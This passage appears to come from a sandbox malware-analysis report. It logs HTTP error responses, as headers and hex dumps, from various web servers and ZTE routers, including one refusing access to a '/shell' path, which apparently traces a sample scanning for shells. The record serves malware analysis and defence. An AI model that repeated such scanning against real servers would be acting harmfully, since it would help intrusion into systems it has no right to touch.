74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Type: text/htmlTransfer-Encoding: chunkedDate: Mon, 01 Nov 2021 09:09:09 GMTServer: LiteSpeedData Raw: 32 37 36 36 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 01 Nov 2021 09:09:09 GMTServer: ApacheContent-Length: 207Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 68 65 6c 6c 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /shellon this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveContent-Type: text/htmlTransfer-Encoding: chunkedDate: Mon, 01 Nov 2021 09:09:10 GMTServer: LiteSpeedData Raw: 32 37 35 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiDate: Mon, 01 Nov 2021 09:09:10 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: ZTE web server 1.0 ZTE corp 2015.Accept-Ranges: bytesConnection: closeX-Frame-Options: SAMEORIGINContent-Type: text/html; charset=iso-8859-1X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockContent-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data:Cache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 46 46 46 46 46 46 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 20 6c 69 6e 6b 3d 22 23 32 30 32 30 66 66 22 20 76 6c 69 6e 6b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 73 70 61 6e 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 73 70 61 6e 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 0a 3c 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 49 46 5f 45 52 52 4f 52 53 54 52 3e 53 65 73 73 69 6f 6e 54 69 6d 65 6f 75 74 3c 2f 49 46 5f 45 52 52 4f 52 53 54 52 3e 0a 3c 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 50 41 52 41 4d 3e 0a 3c 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 53 55 43 43 3c 2f 49 46 5f 45 52 52 4f 52 54 59 50 45 3e 0a 3c 2f 61 6a 61 78 5f 72 65 73 70 6f 6e 73 65 5f 78 6d 6c 5f 72 6f 6f 74 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49 45 20 64 65 69 67 6e 73 20 74 6f 20 73 68 6f 77 20 74 68 69 73 20 65 72 72 6f 72 20 69 6e 73 74 65 61 64 20 6f 66 20 69 74 73 20 6f 77 6e 20 63 61 6e 6e 65 64 20 6f 6e 65 2e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 3e 50 61 64 64 69 6e 67 20 73 6f 20 74 68 61 74 20 4d 53 49
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Mon, 01 Nov 2021 09:09:10 GMTContent-Length: 13724Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:11 GMTServer: ApacheLast-Modified: Wed, 02 Aug 2017 08:47:14 GMTAccept-Ranges: bytesContent-Length: 1242Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:09:12 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 01 Nov 2021 09:09:12 GMTContent-Type: text/htmlContent-Length: 167Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Mini web server 1.0 ZTE corp 2005.Content-Type: text/html; charset=iso-8859-1Accept-Ranges: bytesConnection: closeX-Frame-Options: SAMEORIGINCache-Control: no-cache,no-storeData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <HTML> <HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>404 Not Found</H2>The requested URL was not found on this server.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:16 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 